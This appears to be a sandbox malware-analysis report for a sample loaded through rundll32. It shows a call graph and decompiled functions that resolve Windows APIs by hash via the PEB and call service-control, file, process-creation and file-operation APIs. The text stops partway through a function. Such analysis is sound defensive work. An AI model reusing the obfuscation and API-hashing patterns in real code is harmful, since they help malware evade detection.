4874->4869 4874->4871 4874->4872 4874->4873 4875 30ea99 3 API calls 4874->4875 4977 31bb23 4874->4977 4984 303de2 4874->4984 4987 31d389 4874->4987 4875->4874 5017 317cdb 4876->5017 4878 30ab87 3 API calls 4895 31570e 4878->4895 4879 318519 GetPEB 4879->4895 4880 304816 2 API calls 4880->4895 4881 3146bb 2 API calls 4881->4895 4882 315b08 4883 311e67 2 API calls 4882->4883 4884 315b06 4883->4884 4884->4163 4885 31da22 GetPEB 4885->4895 4887 30cb52 GetPEB 4887->4895 4888 30b6cf GetPEB 4888->4895 4890 31453f GetPEB 4890->4895 4891 308969 GetPEB 4891->4895 4892 31dcf7 RtlAllocateHeap GetPEB 4892->4895 4893 30a8b0 GetPEB 4893->4895 4894 3047ce GetPEB 4894->4895 4895->4878 4895->4879 4895->4880 4895->4881 4895->4882 4895->4884 4895->4885 4895->4887 4895->4888 4895->4890 4895->4891 4895->4892 4895->4893 4895->4894 4896 30ea99 3 API calls 4895->4896 5020 31dedc 4895->5020 5026 318727 4895->5026 4896->4895 4905 30f696 4897->4905 4898 3146bb 2 API calls 4898->4905 4899 30f88f 4899->4163 4900 31da22 GetPEB 4900->4905 4901 31dcf7 RtlAllocateHeap GetPEB 4901->4905 4902 3047ce GetPEB 4902->4905 4903 30b6cf GetPEB 4903->4905 4904 308969 GetPEB 4904->4905 4905->4898 4905->4899 4905->4900 4905->4901 4905->4902 4905->4903 4905->4904 4906 30ab87 3 API calls 4905->4906 4907 30a8b0 GetPEB 4905->4907 4908 30ea99 3 API calls 4905->4908 4906->4905 4907->4905 4908->4905 4915 309a55 4909->4915 4910 309b63 4910->4163 4911 309b65 4913 319e56 GetPEB 4911->4913 4913->4910 4915->4910 4915->4911 5030 3046be 4915->5030 5034 31c3a0 4915->5034 5042 307c37 4915->5042 4925 311c8c 4917->4925 4918 30ab87 3 API calls 4918->4925 4919 31da22 GetPEB 4919->4925 4920 311dd2 4920->4163 4921 30b6cf GetPEB 4921->4925 4922 308969 GetPEB 4922->4925 4923 31dcf7 2 API calls 4923->4925 4924 3047ce GetPEB 4924->4925 4925->4918 4925->4919 4925->4920 4925->4921 4925->4922 4925->4923 4925->4924 4926 30a8b0 GetPEB 4925->4926 4927 30ea99 3 API calls 4925->4927 4926->4925 4927->4925 4933 30ba53 4928->4933 4929 30bb5e 4929->4163 4930 30bb60 4932 319e56 GetPEB 4930->4932 4931 31c3a0 GetPEB 4931->4933 4932->4929 4933->4929 4933->4930 4933->4931 4934 3046be GetPEB 4933->4934 4935 307c37 GetPEB 4933->4935 4934->4933 4935->4933 4937 319e69 4936->4937 4940 306bf2 4937->4940 4941 306c0c 4940->4941 4942 31aa30 GetPEB 4941->4942 4943 306c8f 4942->4943 4943->4840 4945 30b6e5 4944->4945 4946 31aa30 GetPEB 4945->4946 4947 30b742 4946->4947 4947->4853 4949 308980 4948->4949 4950 31d25e GetPEB 4949->4950 4951 308a5d 4950->4951 4951->4853 4954 30eab9 4952->4954 4953 308f65 2 API calls 4953->4954 4954->4953 4955 30ecd6 4954->4955 4958 30ecec 4954->4958 4969 3019b8 4954->4969 4957 311e67 2 API calls 4955->4957 4957->4958 4958->4853 4960 30abb0 4959->4960 4961 304b61 GetPEB 4960->4961 4962 30ad67 4961->4962 4973 307f5d 4962->4973 4964 30ad99 4965 311e67 2 API calls 4964->4965 4968 30ada4 4964->4968 4966 30adc4 4965->4966 4967 311e67 2 API calls 4966->4967 4967->4968 4968->4853 4970 3019dd 4969->4970 4971 31aa30 GetPEB 4970->4971 4972 301a3f 4971->4972 4972->4954 4974 307f8e 4973->4974 4975 31aa30 GetPEB 4974->4975 4976 307fd4 CreateProcessW 4975->4976 4976->4964 4981 31bb48 4977->4981 4978 311e67 2 API calls 4978->4981 4981->4978 4982 31be1d 4981->4982 4983 303de2 GetPEB 4981->4983 4997 320ac8 4981->4997 5001 31d8ec 4981->5001 4982->4874 4983->4981 4985 31aa30 GetPEB 4984->4985 4986 303e36 4985->4986 4986->4874 4988 31d3c3 4987->4988 4990 31d82d 4988->4990 4992 31d82b 4988->4992 4993 304b61 GetPEB 4988->4993 4994 31dcf7 2 API calls 4988->4994 4996 30a8b0 GetPEB 4988->4996 5005 31de10 4988->5005 5009 304241 4988->5009 5013 319008 4990->5013 4992->4874 4993->4988 4994->4988 4996->4988 4998 320af2 4997->4998 4999 31aa30 GetPEB 4998->4999 5000 320b4e 4999->5000 5000->4981 5002 31d8ff 5001->5002 5003 31aa30 GetPEB 5002->5003 5004 31d96e 5003->5004 5004->4981 5006 31de56 5005->5006 5007 31aa30 GetPEB 5006->5007 5008 31deba 5007->5008 5008->4988 5010 304257 5009->5010 5011 31aa30 GetPEB 5010->5011 5012 3042b3 5011->5012 5012->4988 5014 31901a 5013->5014 5015 31aa30 GetPEB 5014->5015 5016 319074 5015->5016 5016->4992 5018 31aa30 GetPEB 5017->5018 5019 317d3e 5018->5019 5019->4895 5022 31df09 5020->5022 5021 31e1a5 5024 320e3a GetPEB 5021->5024 5022->5021 5023 31e1a3 5022->5023 5025 307ff2 2 API calls 5022->5025 5023->4895 5024->5023 5025->5022 5027 318758 5026->5027 5028 31aa30 GetPEB 5027->5028 5029 3187b7 5028->5029 5029->4895 5031 3046e5 5030->5031 5032 31aa30 GetPEB 5031->5032 5033 304737 5032->5033 5033->4915 5035 31c3bc 5034->5035 5036 31c627 5035->5036 5047 30a3a3 5035->5047 5036->4915 5039 30ed7e GetPEB 5040 31c5e2 5039->5040 5040->5036 5041 30ed7e GetPEB 5040->5041 5041->5040 5043 307c52 5042->5043 5044 31cadf GetPEB 5043->5044 5045 307df1 5043->5045 5051 306ca0 5043->5051 5044->5043 5045->4915 5048 30a3c0 5047->5048 5049 31aa30 GetPEB 5048->5049 5050 30a41a 5049->5050 5050->5036 5050->5039 5052 306cb8 5051->5052 5053 31aa30 GetPEB 5052->5053 5054 306d15 5053->5054 5054->5043 5056 31aa30 GetPEB 5055->5056 5057 30f8f4 5056->5057 5057->4180 5059 30a9e6 5058->5059 5060 31aa30 GetPEB 5059->5060 5061 30aa3f 5060->5061 5061->4180 5063 308ee7 5062->5063 5064 31aa30 GetPEB 5063->5064 5065 308f54 5064->5065 5065->4180 5069 30435e 5066->5069 5067 307ff2 2 API calls 5067->5069 5068 30ae64 GetPEB 5068->5069 5069->5067 5069->5068 5070 30457c 5069->5070 5072 3045a6 5069->5072 5077 30ae64 5070->5077 5072->4180 5074 304e8f 5073->5074 5075 31aa30 GetPEB 5074->5075 5076 304ed7 5075->5076 5076->4180 5078 30ae8b 5077->5078 5079 31aa30 GetPEB 5078->5079 5080 30aee2 5079->5080 5080->5072 5083 31001b 5081->5083 5082 318606 2 API calls 5082->5083 5083->5082 5086 31031b 5083->5086 5088 30a8b0 GetPEB 5083->5088 5089 30cd29 5083->5089 5093 30ee81 5083->5093 5098 302206 5083->5098 5086->4189 5088->5083 5090 30cd3f 5089->5090 5091 31aa30 GetPEB 5090->5091 5092 30cd9f 5091->5092 5092->5083 5102 318f15 5093->5102 5097 30eff7 5097->5083 5099 30222a 5098->5099 5100 30a42d GetPEB 5099->5100 5101 302249 5100->5101 5101->5083 5103 318f34 5102->5103 5104 31aa30 GetPEB 5103->5104 5105 30efa8 5104->5105 5105->5097 5106 31db43 5105->5106 5107 31db6c 5106->5107 5108 31aa30 GetPEB 5107->5108 5109 31dbd4 5108->5109 5109->5097 5111 307b13 5110->5111 5112 31aa30 GetPEB 5111->5112 5113 307b7c 5112->5113 5113->4200 5115 318b6f 5114->5115 5116 31aa30 GetPEB 5115->5116 5117 318bd5 5116->5117 5117->4025 5128 309df5 5118->5128 5120 30a305 5120->4217 5123 31dcf7 RtlAllocateHeap GetPEB 5123->5128 5124 30a918 GetPEB 5124->5128 5125 3047ce GetPEB 5125->5128 5126 30a8b0 GetPEB 5126->5128 5127 309dcf 2 API calls 5127->5128 5128->5120 5128->5123 5128->5124 5128->5125 5128->5126 5128->5127 5129 304635 5128->5129 5133 307e00 5128->5133 5137 308abf 5128->5137 5130 30464b 5129->5130 5131 31aa30 GetPEB 5130->5131 5132 3046b0 5131->5132 5132->5128 5134 307e18 5133->5134 5135 31aa30 GetPEB 5134->5135 5136 307e79 5135->5136 5136->5128 5138 308ad1 5137->5138 5139 31aa30 GetPEB 5138->5139 5140 308b32 5139->5140 5140->5128 5152 30e2cc 5141->5152 5145 309ba6 5144->5145 5175 3091dd 5145->5175 5148 309d26 5148->4225 5151 311e67 2 API calls 5151->5148 5156 30e2f1 5152->5156 5158 305357 5156->5158 5159 30e4ef 5156->5159 5161 305988 5156->5161 5164 308e4d 5156->5164 5167 31c15d 5156->5167 5171 302a58 5156->5171 5158->4225 5160 311e67 2 API calls 5159->5160 5160->5158 5162 31aa30 GetPEB 5161->5162 5163 3059db 5162->5163 5163->5156 5165 315c73 GetPEB 5164->5165 5166 308eb3 5165->5166 5166->5156 5168 31c176 5167->5168 5169 31aa30 GetPEB 5168->5169 5170 31c1de 5169->5170 5170->5156 5172 302a71 5171->5172 5173 31aa30 GetPEB 5172->5173 5174 302ad6 5173->5174 5174->5156 5176 31aa30 GetPEB 5175->5176 5177 30923b 5176->5177 5177->5148 5178 3076aa 5177->5178 5179 3076cd 5178->5179 5180 31aa30 GetPEB 5179->5180 5181 307723 5180->5181 5181->5151 5183 31e365 5182->5183 5184 30a42d GetPEB 5183->5184 5185 31e38d 5184->5185 5185->4229 5188 30410d 5186->5188 5189 30421e 5188->5189 5190 31dcf7 2 API calls 5188->5190 5192 30421c 5188->5192 5193 30aad6 GetPEB 5188->5193 5194 30a8b0 GetPEB 5188->5194 5206 301f53 5188->5206 5191 301fd1 GetPEB 5189->5191 5190->5188 5191->5192 5192->4252 5193->5188 5194->5188 5196 316c65 5195->5196 5197 304b61 GetPEB 5196->5197 5198 316d92 5196->5198 5201 316db0 5196->5201 5214 309d31 5196->5214 5197->5196 5210 316637 5198->5210 5201->4252 5203 30b1db 5202->5203 5204 31aa30 GetPEB 5203->5204 5205 30b231 5204->5205 5205->4248 5207 301f6f 5206->5207 5208 31aa30 GetPEB 5207->5208 5209 301fc3 5208->5209 5209->5188 5211 316659 5210->5211 5212 31aa30 GetPEB 5211->5212 5213 3166b7 5212->5213 5213->5201 5215 309d52 5214->5215 5216 31aa30 GetPEB 5215->5216 5217 309dc1 5216->5217 5217->5196 5218 30e991 5219 30ea8d 5218->5219 5220 30ea62 5218->5220 5224 30f8fd 5220->5224 5223 3093ed 2 API calls 5223->5219 5234 30fde0 5224->5234 5225 30ffd1 5227 30ab87 3 API calls 5225->5227 5226 304b61 GetPEB 5226->5234 5228 30ea75 5227->5228 5228->5219 5228->5223 5229 30f899 GetPEB 5229->5234 5230 3146bb 2 API calls 5230->5234 5231 31dcf7 RtlAllocateHeap GetPEB 5231->5234 5232 31da22 GetPEB 5232->5234 5234->5225 5234->5226 5234->5228 5234->5229 5234->5230 5234->5231 5234->5232 5235 30a8b0 GetPEB 5234->5235 5236 3047ce GetPEB 5234->5236 5237 30b23c 5234->5237 5235->5234 5236->5234 5238 30b254 5237->5238 5239 31aa30 GetPEB 5238->5239 5240 30b2b8 lstrcmpiW 5239->5240 5240->5234 5262 304ee3 5263 30b6cf GetPEB 5262->5263 5264 305133 5263->5264 5265 30b23c 2 API calls 5264->5265 5266 30514c 5265->5266 5267 3051ad 5266->5267 5268 31dcf7 2 API calls 5266->5268 5269 305167 5268->5269 5270 3047ce GetPEB 5269->5270 5271 30518e 5270->5271 5272 30a8b0 GetPEB 5271->5272 5273 30519b 5272->5273 5274 311f8a 2 API calls 5273->5274 5274->5267 5275 301993 5276 3019dd 5275->5276 5277 31aa30 GetPEB 5276->5277 5278 301a3f 5277->5278 5241 3081b7 5251 308679 5241->5251 5242 318519 GetPEB 5242->5251 5244 308f65 2 API calls 5244->5251 5245 31da22 GetPEB 5245->5251 5246 307ff2 2 API calls 5246->5251 5247 3086e2 5248 30b6cf GetPEB 5248->5251 5249 3086c6 5253 311e67 2 API calls 5249->5253 5250 30b23c 2 API calls 5250->5251 5251->5242 5251->5244 5251->5245 5251->5246 5251->5247 5251->5248 5251->5249 5251->5250 5254 31c264 5251->5254 5258 31458f 5251->5258 5253->5247 5255 31c291 5254->5255 5256 31aa30 GetPEB 5255->5256 5257 31c2dd 5256->5257 5257->5251 5259 3145a2 5258->5259 5260 31aa30 GetPEB 5259->5260 5261 314619 5260->5261 5261->5251 5279 310a96 5281 310aa6 5279->5281 5282 314087 GetPEB 5279->5282 5282->5281 5283 304c5d 5284 304d8d 5283->5284 5285 304dd2 5284->5285 5286 318606 2 API calls 5284->5286 5287 304da8 5286->5287 5291 30cbdf 5287->5291 5290 30a8b0 GetPEB 5290->5285 5293 30cbfb 5291->5293 5292 304dbc 5292->5290 5293->5292 5295 314011 5293->5295 5296 314026 5295->5296 5297 31aa30 GetPEB 5296->5297 5298 314078 5297->5298 5298->5293

                                                                                                                                  Executed Functions

                                                                                                                                  Function 0030912C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 250 30912c-3091af call 3120b9 call 31aa30 OpenSCManagerW
                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                  			E0030912C(int __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t32;
				signed int _t34;
				int _t43;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t43 = __ecx;
				_push(_a16);
				_push(0);
				_push(_a8);
				_push(0);
				_push(__ecx);
				E003120B9(_t24);
				_v12 = 0x4657ea;
				_t34 = 0x1b;
				_v12 = _v12 / _t34;
				_v12 = _v12 ^ 0x000ac4f3;
				_v8 = 0xb5c996;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x19;
				_v8 = _v8 + 0x3329;
				_v8 = _v8 ^ 0x01161fa0;
				E0031AA30(0x14e, 0x20a9b263, _t34, 0x18e12c58);
				_t32 = OpenSCManagerW(0, 0, _t43); // executed
				return _t32;
			}









                                                                                                                                  0x0030912f
                                                                                                                                  0x00309130
                                                                                                                                  0x00309133
                                                                                                                                  0x00309138
                                                                                                                                  0x0030913a
                                                                                                                                  0x0030913d
                                                                                                                                  0x0030913e
                                                                                                                                  0x00309141
                                                                                                                                  0x00309143
                                                                                                                                  0x00309144
                                                                                                                                  0x00309149
                                                                                                                                  0x0030915a
                                                                                                                                  0x00309162
                                                                                                                                  0x0030916a
                                                                                                                                  0x00309171
                                                                                                                                  0x00309178
                                                                                                                                  0x00309186
                                                                                                                                  0x00309189
                                                                                                                                  0x00309190
                                                                                                                                  0x0030919d
                                                                                                                                  0x003091a8
                                                                                                                                  0x003091af

                                                                                                                                  APIs
                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,000B11AB), ref: 003091A8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ManagerOpen
                                                                                                                                  • String ID: WF
                                                                                                                                  • API String ID: 1889721586-2390014890
                                                                                                                                  • Opcode ID: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                  • Instruction ID: 4d74f762a24e6818c5bb03c54f42f2dcc8cc5aa8a3007e356f1817e848c2a0d4
                                                                                                                                  • Opcode Fuzzy Hash: 1ae6c7d6e897e9fd4074bf1914c4816ed8008dd5649bb50acbdcfee0caf21ed1
                                                                                                                                  • Instruction Fuzzy Hash: 49016971901108FBEB09CB95DD4ACEFBFB8EF85714F108099F404A7200D3B15F509AA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 003042C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39serviceCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 255 3042c4-304345 call 3120b9 call 31aa30 OpenServiceW
                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                  			E003042C4(void* __ecx, void* __edx, intOrPtr _a4, int _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t34 = __edx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003120B9(_t24);
				_v8 = 0x971c9e;
				_v8 = _v8 >> 3;
				_v8 = _v8 + 0xbdaa;
				_v8 = _v8 | 0x44f2c0c3;
				_v8 = _v8 ^ 0x44fb9439;
				_v12 = 0x762558;
				_v12 = _v12 | 0xdc63e739;
				_v12 = _v12 ^ 0xdc7b8d87;
				E0031AA30(0x20c, 0x20a9b263, __ecx, 0x47b96070);
				_t29 = OpenServiceW(_t34, _a12, _a8); // executed
				return _t29;
			}








                                                                                                                                  0x003042c7
                                                                                                                                  0x003042c8
                                                                                                                                  0x003042ca
                                                                                                                                  0x003042cd
                                                                                                                                  0x003042cf
                                                                                                                                  0x003042d2
                                                                                                                                  0x003042d5
                                                                                                                                  0x003042d8
                                                                                                                                  0x003042db
                                                                                                                                  0x003042dc
                                                                                                                                  0x003042dd
                                                                                                                                  0x003042e2
                                                                                                                                  0x003042ec
                                                                                                                                  0x003042f5
                                                                                                                                  0x003042fc
                                                                                                                                  0x00304303
                                                                                                                                  0x0030430a
                                                                                                                                  0x00304311
                                                                                                                                  0x00304318
                                                                                                                                  0x00304330
                                                                                                                                  0x0030433f
                                                                                                                                  0x00304345

                                                                                                                                  APIs
                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,?,2635DC09,?,?,?,2635DC09,00314A8F,?,?,2635DC09), ref: 0030433F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: OpenService
                                                                                                                                  • String ID: X%v
                                                                                                                                  • API String ID: 3098006287-3430654708
                                                                                                                                  • Opcode ID: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                  • Instruction ID: 56d3eb533c09e04bc8c6452136f01526d4d3941a93ad1469f4c2b59af885bfd2
                                                                                                                                  • Opcode Fuzzy Hash: a6c45227f0e40a07600cbbb7be6837513f8e3cf64bcdc6244eca30a284eb53f8
                                                                                                                                  • Instruction Fuzzy Hash: 450104B681120CFBDF16DFD4D9468DEBF79EF18314F148188F90566221D2729B609B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00308F65 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 260 308f65-309010 call 3120b9 call 31aa30 CreateFileW
                                                                                                                                  C-Code - Quality: 35%
                                                                                                                                  			E00308F65(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, long _a12, long _a20, intOrPtr _a24, long _a28, intOrPtr _a32, long _a40) {
				signed int _v8;
				signed int _v12;
				void* _v24;
				intOrPtr _v28;
				void* _t32;
				void* _t38;

				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003120B9(_t32);
				_v28 = 0xee6fdc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = 0x957ab3;
				_v12 = _v12 ^ 0x02d9a910;
				_v12 = _v12 + 0xffff8488;
				_v12 = _v12 ^ 0x02485b8e;
				_v8 = 0xf6b813;
				_v8 = _v8 + 0xffff9c70;
				_v8 = _v8 + 0xffff858c;
				_v8 = _v8 ^ 0x00f72129;
				E0031AA30(0xe9, 0x9df7cc0d, __ecx, 0xa7362403);
				_t38 = CreateFileW(_a4, _a20, _a40, 0, _a28, _a12, 0); // executed
				return _t38;
			}









                                                                                                                                  0x00308f6d
                                                                                                                                  0x00308f72
                                                                                                                                  0x00308f73
                                                                                                                                  0x00308f76
                                                                                                                                  0x00308f79
                                                                                                                                  0x00308f7c
                                                                                                                                  0x00308f7f
                                                                                                                                  0x00308f80
                                                                                                                                  0x00308f83
                                                                                                                                  0x00308f86
                                                                                                                                  0x00308f8a
                                                                                                                                  0x00308f8b
                                                                                                                                  0x00308f90
                                                                                                                                  0x00308f9f
                                                                                                                                  0x00308faa
                                                                                                                                  0x00308fb1
                                                                                                                                  0x00308fb2
                                                                                                                                  0x00308fb9
                                                                                                                                  0x00308fc0
                                                                                                                                  0x00308fc7
                                                                                                                                  0x00308fce
                                                                                                                                  0x00308fd5
                                                                                                                                  0x00308fdc
                                                                                                                                  0x00308fe3
                                                                                                                                  0x00308ff0
                                                                                                                                  0x00309009
                                                                                                                                  0x00309010

                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(02485B8E,00EE6FDC,?,00000000,65528FD4,?,00000000), ref: 00309009
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateFile
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                  • Opcode ID: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                  • Instruction ID: 736b73b008399f08bf646e5d28eaf617186969f5bbcfd8726e2a2af9b4133256
                                                                                                                                  • Opcode Fuzzy Hash: 18f2a3f1900b150d1c8a29a5a24bb32d68d7ea1513a2f5f5666481f22823c7ab
                                                                                                                                  • Instruction Fuzzy Hash: F1112B72901219FBCF229FE5DD098DFBFB5EF58354F118148F90862121C3328A61EB91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00307F5D Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 265 307f5d-307ff1 call 3120b9 call 31aa30 CreateProcessW
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,0030AD99,?,?,?,181C8C04,0030AD99), ref: 00307FEB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                  • Instruction ID: 151d163903b553ec21ff3c7fe19df96059da40df6ac3aca3f0d2d3b8d9b3f942
                                                                                                                                  • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                  • Instruction Fuzzy Hash: 0211E872402118BBDF669F91DD09CDF7F79FF093A4F145144F91925121D3728AA0EBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00304DDD Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 270 304ddd-304e73 call 3120b9 call 31aa30 SHFileOperationW
                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                  			E00304DDD(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t30;
				int _t38;
				signed int _t40;
				signed int _t44;
				struct _SHFILEOPSTRUCTW* _t45;

				_push(_a12);
				_t45 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003120B9(_t30);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x8324bd;
				_v20 = 0xe59c0f;
				_v12 = 0xfa6a5a;
				_v12 = _v12 | 0x6fcfbea7;
				_t40 = 0x1a;
				_push(0x3771311d);
				_push(_t40);
				_v12 = _v12 * 0x42;
				_v12 = _v12 ^ 0xdff430a4;
				_v8 = 0x460bc4;
				_v8 = _v8 | 0x3946640e;
				_push(0xdf0d4f1a);
				_v8 = _v8 / _t40;
				_v8 = _v8 + 0x2a2;
				_v8 = _v8 ^ 0x023f16a4;
				_t44 = 0x58;
				E0031AA30(_t44);
				_t38 = SHFileOperationW(_t45); // executed
				return _t38;
			}













                                                                                                                                  0x00304de4
                                                                                                                                  0x00304de7
                                                                                                                                  0x00304de9
                                                                                                                                  0x00304dec
                                                                                                                                  0x00304def
                                                                                                                                  0x00304df1
                                                                                                                                  0x00304df6
                                                                                                                                  0x00304dfd
                                                                                                                                  0x00304e06
                                                                                                                                  0x00304e0d
                                                                                                                                  0x00304e14
                                                                                                                                  0x00304e21
                                                                                                                                  0x00304e22
                                                                                                                                  0x00304e27
                                                                                                                                  0x00304e28
                                                                                                                                  0x00304e2b
                                                                                                                                  0x00304e32
                                                                                                                                  0x00304e39
                                                                                                                                  0x00304e45
                                                                                                                                  0x00304e4a
                                                                                                                                  0x00304e4d
                                                                                                                                  0x00304e54
                                                                                                                                  0x00304e63
                                                                                                                                  0x00304e64
                                                                                                                                  0x00304e6d
                                                                                                                                  0x00304e73

                                                                                                                                  APIs
                                                                                                                                  • SHFileOperationW.SHELL32(12DA7D1B,?,?,?,?,?,?,?,?), ref: 00304E6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.499309188.0000000000301000.00000020.00000800.00020000.00000000.sdmp, Offset: 00300000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.499302641.0000000000300000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.499327123.0000000000323000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_300000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileOperation
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3080627654-0
                                                                                                                                  • Opcode ID: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                  • Instruction ID: 40417041b761de47ad832eb106bbeefc5b274689b46173ef03a6ce4774631be6
                                                                                                                                  • Opcode Fuzzy Hash: 5a6999f68b0982e57ffb7ab1c7ed40ff32dcce97c4b5d87dd0d5c33dbec08c15
                                                                                                                                  • Instruction Fuzzy Hash: 43016DB5E0120DFBCB14EFA4D9469DEBFB4EF44318F10C088E904AB251D3744B549B91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00305DDD Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E00305DDD(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t21;
				intOrPtr* _t25;
